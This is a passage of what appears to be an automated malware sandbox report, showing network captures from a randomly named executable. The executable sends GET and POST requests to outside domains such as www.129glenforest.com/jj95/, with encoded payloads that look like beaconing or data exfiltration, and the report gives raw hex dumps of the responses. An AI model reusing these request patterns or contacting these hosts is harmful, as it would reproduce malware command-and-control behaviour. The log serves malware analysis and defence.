                                                                                  Data Raw: 32 64 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 54 df 6f d3 30 10 7e df 5f 71 64 02 81 44 ea a6 2d 6c 4d d2 48 a3 dd c4 a4 01 13 14 01 8f 5e 72 8d cd 12 3b d8 d7 b4 61 e2 7f 47 4e b2 b6 13 bf 5e 70 5e e2 bb ef be ef ce be 73 fc 68 f1 6e be fc 72 7d 0e 82 ca 02 ae 3f be ba ba 9c 83 e7 33 f6 69 3c 67 6c b1 5c c0 e7 d7 cb 37 57 10 0c 86 f0 81 8c 4c 89 b1 f3 b7 1e 78 82 a8 0a 19 db 6c 36 83 cd 78 a0 4d ce 96 ef d9 d6 b1 04 2e ac ff f5 6d 1b 33 c8 28 f3 92 a3 b8 15 d9 96 85 b2 b3 df 10 04 d3 e9 b4 8b f3 1c 28 2c b8 ca 67 1e 2a 0f 76 7f 49 2c 90 67 c9 11 00 40 4c 92 0a 4c 26 c3 09 3c 29 33 6e 45 04 6f 35 c1 85 5e ab 2c 66 9d b3 03 96 48 1c 9c 9e 8f df d6 b2 9e 79 73 ad 08 15 f9 cb a6 42 0f d2 6e 37 f3 08 b7 c4 9c 7e 04 a9 e0 c6 22 cd 3e 2e 2f fc 53 8f 1d 12 29 5e e2 cc cb d0 a6 46 56 24 b5 3a 60 f8 a0 8d 69 9e 43 c5 73 04 a5 09 56 2e 99 5d b8 a5 a6 40 a0 a6 c2 5e 2b b5 d6 eb 7c 6e dd e8 ac 81 bb 95 56 e4 5b f9 1d c3 60 52 6d 23 48 75 a1 4d 78 7c d2 ae 08 5a f7 8a 97 b2 68 42 6e 24 2f 22 70 54 3e 2f 64 ae [TRUNCATED]
                                                                                  Data Ascii: 2d4To0~_qdD-lMH^r;aGN^p^shnr}?3i<gl\7WLxl6xM.m3((,g*vI,g@LL&<)3nEo5^,fHysBn7~">./S)^FV$:`iCsV.]@^+|nV[`Rm#HuMx|ZhBn$/"pT>/d~8Etx@9]DPrK}#p89xIE`
                                                                                  Nov 13, 2024 15:36:10.182215929 CET339INData Raw: 0d ca 5c 50 08 37 ba c8 22 28 90 08 8d 6f 2b 9e 4a 95 87 e0 07 0e 78 2f ef 8f 5b f9 f1 b4 da 1e e8 57 70 b7 91 19 89 70 dc d1 fe 5a 6c 4f e0 17 b8 a2 90 af 49 47 bd c1 b4 da ad e5 1e 43 ba 0a 61 ec ea dc 2b 64 b2 fe 2f 1a 7b 46 1e 16 52 dd ee cf
                                                                                  Data Ascii: \P7"(o+Jx/[WppZlOIGCa+d/{FRm<y1~yPK+bxJBuCs{Jbj7Vjry}x0J]L$v5l i4Lm'psJ H-|][RvZ_R


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.550014172.67.197.57803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:11.863580942 CET444OUTGET /b9df/?2J=dUH3FVfSLAHIHBRMvvPQgLWf0KXIT0dr2Awu2k06qg9LbooImE5C092/euUAt8NBFlVUBHDmvHBa3+G+T/z9BT74tEsDe+Pl6mU5GIhBpG7WZgGiesGf3hUVa6du6lWzSg==&tXul=U2UloNhP HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Host: www.lsfanarolt.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Nov 13, 2024 15:36:12.732916117 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 13 Nov 2024 14:36:12 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Last-Modified: Thu, 29 Aug 2024 17:48:32 GMT
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yuB8W0H13iVlOUSTVbHzFlx9p9D2fhF8LS5wQeXcCZ3aToVDlE1qClAKh6JNKz2nmYc3CwzKbUe%2Fa5ZFGCpFDTKN02J%2FGo3xFve3ROVFU%2FfJQ6H58mv%2Bt8hcJYVflf75Ix9EIFIc"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e1f7e215f6c0bfb-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1387&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=444&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 35 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e [TRUNCATED]
                                                                                  Data Ascii: 586<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14p
                                                                                  Nov 13, 2024 15:36:12.733031988 CET1005INData Raw: 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30
                                                                                  Data Ascii: x; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.55001550.18.131.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:17.977659941 CET715OUTPOST /jj95/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.129glenforest.com
                                                                                  Origin: http://www.129glenforest.com
                                                                                  Referer: http://www.129glenforest.com/jj95/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 203
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 43 63 5a 4c 70 4b 52 75 61 4c 51 39 70 39 46 71 42 6b 44 67 71 69 43 2f 36 72 33 63 44 41 77 54 53 63 72 62 72 33 61 2f 6e 55 57 78 2f 4a 43 68 5a 47 5a 41 47 34 58 61 43 4a 42 73 41 4d 7a 46 34 64 41 66 6b 54 72 72 30 7a 74 6d 78 58 4e 6a 36 46 36 49 68 79 62 39 72 6a 72 58 44 34 2f 50 51 4c 42 73 5a 72 6b 51 61 68 67 51 4a 37 50 6a 68 72 50 65 68 5a 6b 50 35 57 30 5a 42 54 55 4d 7a 52 4e 57 4d 4f 52 64 63 34 6e 34 66 78 4f 69 37 62 64 33 79 6c 78 70 56 58 59 36 2b 77 72 63 50 70 50 68 58 52 47 36 57 45 75 2f 35 47 31 48 4e 4d 59 33 64 6c 55 77 43 53 54 52 78 52 42 69 4e 6b 71 46 4f 72 6b 3d
                                                                                  Data Ascii: 2J=CcZLpKRuaLQ9p9FqBkDgqiC/6r3cDAwTScrbr3a/nUWx/JChZGZAG4XaCJBsAMzF4dAfkTrr0ztmxXNj6F6Ihyb9rjrXD4/PQLBsZrkQahgQJ7PjhrPehZkP5W0ZBTUMzRNWMORdc4n4fxOi7bd3ylxpVXY6+wrcPpPhXRG6WEu/5G1HNMY3dlUwCSTRxRBiNkqFOrk=
                                                                                  Nov 13, 2024 15:36:18.895979881 CET1236INHTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:18 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=O+KGsXKJ/+jN8rubP/io+1MDqTA2wgPxaTekZ3q6A++Spci7nvLbmvSFFxQdOGGjgD7R2Br4OrD9Z0JmAnBeWKIsOWcMJTfpqQ4s1bXrhJPLKdkw+HdzX984UDQk; Expires=Wed, 20 Nov 2024 14:36:18 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=O+KGsXKJ/+jN8rubP/io+1MDqTA2wgPxaTekZ3q6A++Spci7nvLbmvSFFxQdOGGjgD7R2Br4OrD9Z0JmAnBeWKIsOWcMJTfpqQ4s1bXrhJPLKdkw+HdzX984UDQk; Expires=Wed, 20 Nov 2024 14:36:18 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=776d5855-197b-4456-bdb0-1e7a1735a9d8;Path=/;Expires=Thu, 12-Nov-2054 22:27:48 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:48 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508578551;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508578551;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 00 85 54 4d 73 d3 30 10 bd f3 2b 84 4f 30 44 96 f3 4d d3 38 3d 50 86 0b 43 f9 e8 0c c3 89 91 ed b5 ad 44 96 54 69 9d 34 fc 7a d6 4e 42 4b 09 d3 83 b3 f6 ae de d3 db d5 53 96 2f af 6f de dd fe f8 fc 9e d5 d8 e8 d5 8b 65 17 98 96 a6 4a 23 30 51 97 00 59 50 68 00 25 cb 6b e9 03 60 1a b5 58 f2 b7 5d 15 15 6a 58 0d 47 17 ec 83 06 53 5a 0f 01 d9 d7 22 5e 8a 43 e5 08 34 b2 81 34 da 2a d8 39 eb 31 62 b9 35 08 86 88 76 aa c0 3a 2d 60 ab 72 e0 fd
                                                                                  Data Ascii: 28eTMs0+O0DM8=PCDTi4zNBKS/oeJ#0QYPh%k`X]jXGSZ"^C44*91b5v:-`r
                                                                                  Nov 13, 2024 15:36:18.896133900 CET505INData Raw: c7 80 29 a3 50 49 cd 43 2e 35 a4 c3 38 e9 36 d2 ca 6c 98 07 9d 46 01 f7 1a 42 0d 40 3c b5 87 32 8d 6a 44 17 16 42 94 c4 1a e2 ca da 4a 83 74 2a c4 b9 6d 44 1e c2 55 29 1b a5 f7 e9 8d 03 f3 e6 9b 34 61 31 4e 92 c1 84 9e 19 3d f3 e4 d9 0d 84 d3 6d
                                                                                  Data Ascii: )PIC.586lFB@<2jDBJt*mDU)4a1N=mLK',uQ&#k; ~uqIn!]0GQIdFun],24:mdmMh~u6c(aNv+"*+<wEK^h:%
                                                                                  Nov 13, 2024 15:36:18.896384954 CET505INData Raw: c7 80 29 a3 50 49 cd 43 2e 35 a4 c3 38 e9 36 d2 ca 6c 98 07 9d 46 01 f7 1a 42 0d 40 3c b5 87 32 8d 6a 44 17 16 42 94 c4 1a e2 ca da 4a 83 74 2a c4 b9 6d 44 1e c2 55 29 1b a5 f7 e9 8d 03 f3 e6 9b 34 61 31 4e 92 c1 84 9e 19 3d f3 e4 d9 0d 84 d3 6d
                                                                                  Data Ascii: )PIC.586lFB@<2jDBJt*mDU)4a1N=mLK',uQ&#k; ~uqIn!]0GQIdFun],24:mdmMh~u6c(aNv+"*+<wEK^h:%
                                                                                  Nov 13, 2024 15:36:18.896892071 CET1236INHTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:18 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=O+KGsXKJ/+jN8rubP/io+1MDqTA2wgPxaTekZ3q6A++Spci7nvLbmvSFFxQdOGGjgD7R2Br4OrD9Z0JmAnBeWKIsOWcMJTfpqQ4s1bXrhJPLKdkw+HdzX984UDQk; Expires=Wed, 20 Nov 2024 14:36:18 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=O+KGsXKJ/+jN8rubP/io+1MDqTA2wgPxaTekZ3q6A++Spci7nvLbmvSFFxQdOGGjgD7R2Br4OrD9Z0JmAnBeWKIsOWcMJTfpqQ4s1bXrhJPLKdkw+HdzX984UDQk; Expires=Wed, 20 Nov 2024 14:36:18 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=776d5855-197b-4456-bdb0-1e7a1735a9d8;Path=/;Expires=Thu, 12-Nov-2054 22:27:48 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:48 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508578551;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508578551;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:18 UTC;HttpOnly
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 00 85 54 4d 73 d3 30 10 bd f3 2b 84 4f 30 44 96 f3 4d d3 38 3d 50 86 0b 43 f9 e8 0c c3 89 91 ed b5 ad 44 96 54 69 9d 34 fc 7a d6 4e 42 4b 09 d3 83 b3 f6 ae de d3 db d5 53 96 2f af 6f de dd fe f8 fc 9e d5 d8 e8 d5 8b 65 17 98 96 a6 4a 23 30 51 97 00 59 50 68 00 25 cb 6b e9 03 60 1a b5 58 f2 b7 5d 15 15 6a 58 0d 47 17 ec 83 06 53 5a 0f 01 d9 d7 22 5e 8a 43 e5 08 34 b2 81 34 da 2a d8 39 eb 31 62 b9 35 08 86 88 76 aa c0 3a 2d 60 ab 72 e0 fd
                                                                                  Data Ascii: 28eTMs0+O0DM8=PCDTi4zNBKS/oeJ#0QYPh%k`X]jXGSZ"^C44*91b5v:-`r


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.55001650.18.131.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:20.531511068 CET735OUTPOST /jj95/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.129glenforest.com
                                                                                  Origin: http://www.129glenforest.com
                                                                                  Referer: http://www.129glenforest.com/jj95/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 223
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 43 63 5a 4c 70 4b 52 75 61 4c 51 39 6f 64 56 71 44 44 33 67 39 79 43 38 35 72 33 63 4b 67 77 70 53 63 6e 62 72 7a 43 4a 6e 6d 79 78 38 74 47 68 59 43 4e 41 48 34 58 61 4e 5a 42 70 50 73 7a 4f 34 64 45 70 6b 54 6e 72 30 7a 35 6d 78 54 64 6a 35 30 36 4c 68 69 62 2f 2b 54 72 56 62 59 2f 50 51 4c 42 73 5a 71 46 37 61 69 51 51 4a 50 7a 6a 7a 36 50 64 73 35 6b 41 2b 57 30 5a 46 54 55 49 7a 52 4d 73 4d 50 64 6e 63 36 76 34 66 77 2b 69 37 4f 78 30 37 6c 78 7a 49 48 59 76 74 78 61 6b 4d 4a 2f 68 4b 54 50 77 58 54 4b 72 34 77 45 74 58 75 51 66 4f 46 34 49 53 42 62 6d 67 68 67 4c 58 48 36 31 51 38 79 5a 57 7a 2b 2f 4e 4a 6e 64 7a 72 49 76 71 64 76 4b 75 65 42 35
                                                                                  Data Ascii: 2J=CcZLpKRuaLQ9odVqDD3g9yC85r3cKgwpScnbrzCJnmyx8tGhYCNAH4XaNZBpPszO4dEpkTnr0z5mxTdj506Lhib/+TrVbY/PQLBsZqF7aiQQJPzjz6Pds5kA+W0ZFTUIzRMsMPdnc6v4fw+i7Ox07lxzIHYvtxakMJ/hKTPwXTKr4wEtXuQfOF4ISBbmghgLXH61Q8yZWz+/NJndzrIvqdvKueB5
                                                                                  Nov 13, 2024 15:36:21.192511082 CET1236INHTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:21 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=EQuUlB2+bOBJDJhhXe3aOfgaWAN8lG6Q/65p7JxxFDL6t7Q4tgQjbx+hYSCGWVjqK8TeuAjsX6Fou14FlBx7tq/UoSehvbKUhpI8zddtMzqrm8im9SZAeDjiGL+S; Expires=Wed, 20 Nov 2024 14:36:21 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=EQuUlB2+bOBJDJhhXe3aOfgaWAN8lG6Q/65p7JxxFDL6t7Q4tgQjbx+hYSCGWVjqK8TeuAjsX6Fou14FlBx7tq/UoSehvbKUhpI8zddtMzqrm8im9SZAeDjiGL+S; Expires=Wed, 20 Nov 2024 14:36:21 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=af74a505-5ef0-41de-803a-579c3abd654f;Path=/;Expires=Thu, 12-Nov-2054 22:27:51 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:51 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508581098;Path=/;Expires=Tue, 11-Feb-2025 14:36:21 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508581098;Path=/;Expires=Tue, 11-Feb-2025 14:36:21 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:21 UTC;HttpOnly
                                                                                  Content-Encoding: gzip
                                                                                  Data Raw: 32 38 65 0d 0a 1f 8b 08 00 00 00 00 00 00 00 85 54 4d 73 d3 30 10 bd f3 2b 84 4f 30 44 96 f3 4d d3 38 3d 50 86 0b 43 f9 e8 0c c3 89 91 ed b5 ad 44 96 54 69 9d 34 fc 7a d6 4e 42 4b 09 d3 83 b3 f6 ae de d3 db d5 53 96 2f af 6f de dd fe f8 fc 9e d5 d8 e8 d5 8b 65 17 98 96 a6 4a 23 30 51 97 00 59 50 68 00 25 cb 6b e9 03 60 1a b5 58 f2 b7 5d 15 15 6a 58 0d 47 17 ec 83 06 53 5a 0f 01 d9 d7 22 5e 8a 43 e5 08 34 b2 81 34 da 2a d8 39 eb 31 62 b9 35 08 86 88 76 aa c0 3a 2d 60 ab 72 e0 fd
                                                                                  Data Ascii: 28eTMs0+O0DM8=PCDTi4zNBKS/oeJ#0QYPh%k`X]jXGSZ"^C44*91b5v:-`r
                                                                                  Nov 13, 2024 15:36:21.192677021 CET505INData Raw: c7 80 29 a3 50 49 cd 43 2e 35 a4 c3 38 e9 36 d2 ca 6c 98 07 9d 46 01 f7 1a 42 0d 40 3c b5 87 32 8d 6a 44 17 16 42 94 c4 1a e2 ca da 4a 83 74 2a c4 b9 6d 44 1e c2 55 29 1b a5 f7 e9 8d 03 f3 e6 9b 34 61 31 4e 92 c1 84 9e 19 3d f3 e4 d9 0d 84 d3 6d
                                                                                  Data Ascii: )PIC.586lFB@<2jDBJt*mDU)4a1N=mLK',uQ&#k; ~uqIn!]0GQIdFun],24:mdmMh~u6c(aNv+"*+<wEK^h:%


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.55001750.18.131.220803160C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 13, 2024 15:36:23.090507984 CET1752OUTPOST /jj95/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.129glenforest.com
                                                                                  Origin: http://www.129glenforest.com
                                                                                  Referer: http://www.129glenforest.com/jj95/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 1239
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2) Gecko/20100115 Firefox/3.6
                                                                                  Data Raw: 32 4a 3d 43 63 5a 4c 70 4b 52 75 61 4c 51 39 6f 64 56 71 44 44 33 67 39 79 43 38 35 72 33 63 4b 67 77 70 53 63 6e 62 72 7a 43 4a 6e 6d 36 78 38 59 53 68 5a 6a 4e 41 45 34 58 61 4f 5a 42 6f 50 73 7a 70 34 63 68 67 6b 53 62 52 30 78 42 6d 72 30 31 6a 38 47 53 4c 76 69 62 2f 38 54 72 57 44 34 2b 56 51 4c 78 6f 5a 71 31 37 61 69 51 51 4a 4f 6a 6a 77 72 50 64 75 35 6b 50 35 57 31 4e 42 54 55 67 7a 52 46 4f 4d 50 59 51 64 4b 50 34 65 51 75 69 33 63 4a 30 30 6c 78 31 4a 48 5a 71 74 78 57 37 4d 4b 4c 58 4b 53 4c 65 58 56 36 72 35 55 74 4d 43 64 64 4a 4d 56 63 79 65 53 48 37 6e 30 77 5a 55 30 61 6f 54 76 62 36 66 67 43 54 44 5a 6a 76 35 34 42 66 35 5a 66 45 72 62 55 61 6e 79 37 56 4e 39 67 47 6f 6c 7a 63 77 50 73 73 49 58 4d 68 64 57 57 45 57 43 66 31 51 70 34 4a 38 59 45 78 76 4c 4c 42 76 34 72 37 33 4d 69 75 32 4b 78 75 54 2f 4f 72 77 78 53 77 50 70 49 4a 76 75 4f 2b 43 77 4a 4a 45 78 4f 63 58 35 65 67 42 6e 77 54 72 62 7a 7a 46 4e 4a 59 71 6d 6a 75 4c 73 5a 54 6a 73 5a 70 4e 62 65 48 65 36 65 47 4d 78 71 [TRUNCATED]
                                                                                  Data Ascii: 2J=CcZLpKRuaLQ9odVqDD3g9yC85r3cKgwpScnbrzCJnm6x8YShZjNAE4XaOZBoPszp4chgkSbR0xBmr01j8GSLvib/8TrWD4+VQLxoZq17aiQQJOjjwrPdu5kP5W1NBTUgzRFOMPYQdKP4eQui3cJ00lx1JHZqtxW7MKLXKSLeXV6r5UtMCddJMVcyeSH7n0wZU0aoTvb6fgCTDZjv54Bf5ZfErbUany7VN9gGolzcwPssIXMhdWWEWCf1Qp4J8YExvLLBv4r73Miu2KxuT/OrwxSwPpIJvuO+CwJJExOcX5egBnwTrbzzFNJYqmjuLsZTjsZpNbeHe6eGMxqfd9ja/2VCUfBjyEZMgp7rKm6yAvkOCZpPnCYv8pgq+ZUD8ke/lpLv95gkcBm+vqng33fhrHmj+/9Qkxn10OmLc+EvjJFvGxXqEPOOvriB/SLaUYYijFn8Ad8OkAI4x7hC0s4W8/g7+IN/y6gxMiAxW3+o+0IPuREmit2DYanfyq89B1Ixd8G+cSVK4HHmTeF0EZGcSKntxWGZeLlj4efNFACDzi/yjqVKLPmzhBiChiIRAxjwVMcAzpVLYKYS1BeV8IyU3BzaAxxy19w0AF1RMQdjFd0Xr5LbPwzhssuUXFNbHbTLeGjcciKsp/zM/naB1u9w61ZQJrS5V8INMVUameiXBHgSFsbtad9MjktP78kUqfCdm69uwO8b3b/YwZtoFtWGg7265rHfNyZb9Awp7+dyMxtV/GsqNyzzsSpocqEsqodFZpyy7iHQtKlFZXtX/inCO0glTKuCJcuw34zMyCe89KugMQn6tEju2fTrd/CMToDAODgjxKTfiQ9X8vMNzMNXx+JQdy4C45vtRux3gyQE6+4IrtWaDTsM7Gn3yaA8Kx/yMZsJRhIZfSQTcxVwZFk/pPRU3M9WnqxoX73pBM7aGDyl5ozxRvyN/dA/RL12B3fFg3HHbC1oxPxc/Ti2AjJ9Bq6SpndNOeOQHZgExtkrEvKQNkGmZ [TRUNCATED]
                                                                                  Nov 13, 2024 15:36:23.778850079 CET1236INHTTP/1.1 200
                                                                                  Date: Wed, 13 Nov 2024 14:36:23 GMT
                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: AWSALB=ro+ktLKCkXT1ZnjEnv0MsDK2xk8oAopFBeH8CLd1jjVlvUbK0NV7CuUskyu5470SiYJB6EPLaUKZL0rFZL46ojjFmmx1Wk6VgvY4azrTeNC/70xhWdKk5TRNZavm; Expires=Wed, 20 Nov 2024 14:36:23 GMT; Path=/
                                                                                  Set-Cookie: AWSALBCORS=ro+ktLKCkXT1ZnjEnv0MsDK2xk8oAopFBeH8CLd1jjVlvUbK0NV7CuUskyu5470SiYJB6EPLaUKZL0rFZL46ojjFmmx1Wk6VgvY4azrTeNC/70xhWdKk5TRNZavm; Expires=Wed, 20 Nov 2024 14:36:23 GMT; Path=/; SameSite=None
                                                                                  Server: nginx/1.26.2
                                                                                  Set-Cookie: cfid=08ac740d-6d2e-48c3-bbb2-c9f12ab6be5e;Path=/;Expires=Thu, 12-Nov-2054 22:27:53 UTC;HttpOnly
                                                                                  Set-Cookie: cftoken=0;Path=/;Expires=Thu, 12-Nov-2054 22:27:53 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_LV=1731508583684;Path=/;Expires=Tue, 11-Feb-2025 14:36:23 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_TC=1731508583684;Path=/;Expires=Tue, 11-Feb-2025 14:36:23 UTC;HttpOnly
                                                                                  Set-Cookie: CF_CLIENT_CRIBFLYER_HC=2;Path=/;Expires=Tue, 11-Feb-2025 14:36:23 UTC;HttpOnly
                                                                                  Content-Encoding: gzip
